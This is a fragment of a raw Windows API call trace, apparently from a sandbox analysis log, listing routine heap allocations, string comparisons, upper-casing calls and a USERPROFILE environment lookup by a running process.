hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0202.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0202.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0202.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0202.805] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0202.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0202.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0202.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0202.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0202.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0202.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0202.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0202.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0202.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0202.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0202.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0202.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0202.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0202.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0202.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0202.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0202.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0202.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x32) returned 0x2a5eb40 [0202.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Temporary Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="emporary Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mporary Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="porary Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orary Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rary Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ary Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ry Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Internet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nternet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ternet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ernet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rnet Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="net Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="et Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0202.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0202.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0202.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0202.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0202.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0202.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0202.807] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0202.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0202.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0202.807] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0202.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0202.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0202.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0202.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0202.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0202.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0202.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0202.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0202.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0202.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0202.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0202.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0202.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0202.808] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0202.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0202.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0202.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa738 [0202.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0202.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0202.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0202.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0202.808] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0202.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0202.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0202.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0202.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0202.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0202.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0202.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0202.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0202.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0202.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0202.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0202.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0202.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0202.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0202.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0202.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0202.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0202.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0202.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0202.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0202.809] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0202.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa630 [0202.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0202.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0202.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0202.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0202.810] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0202.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0202.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0202.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0202.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0202.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0202.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0202.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0202.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0202.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0202.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0202.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0202.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0202.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0202.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0202.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0202.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0202.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0202.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0202.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0202.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0202.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0202.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0202.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0202.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0202.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0202.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0202.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0202.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0202.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0202.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0202.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0202.812] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0202.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0202.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0202.812] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0202.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0202.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0202.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0202.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0202.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0202.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0202.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0202.813] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0202.813] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0202.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0202.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0202.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 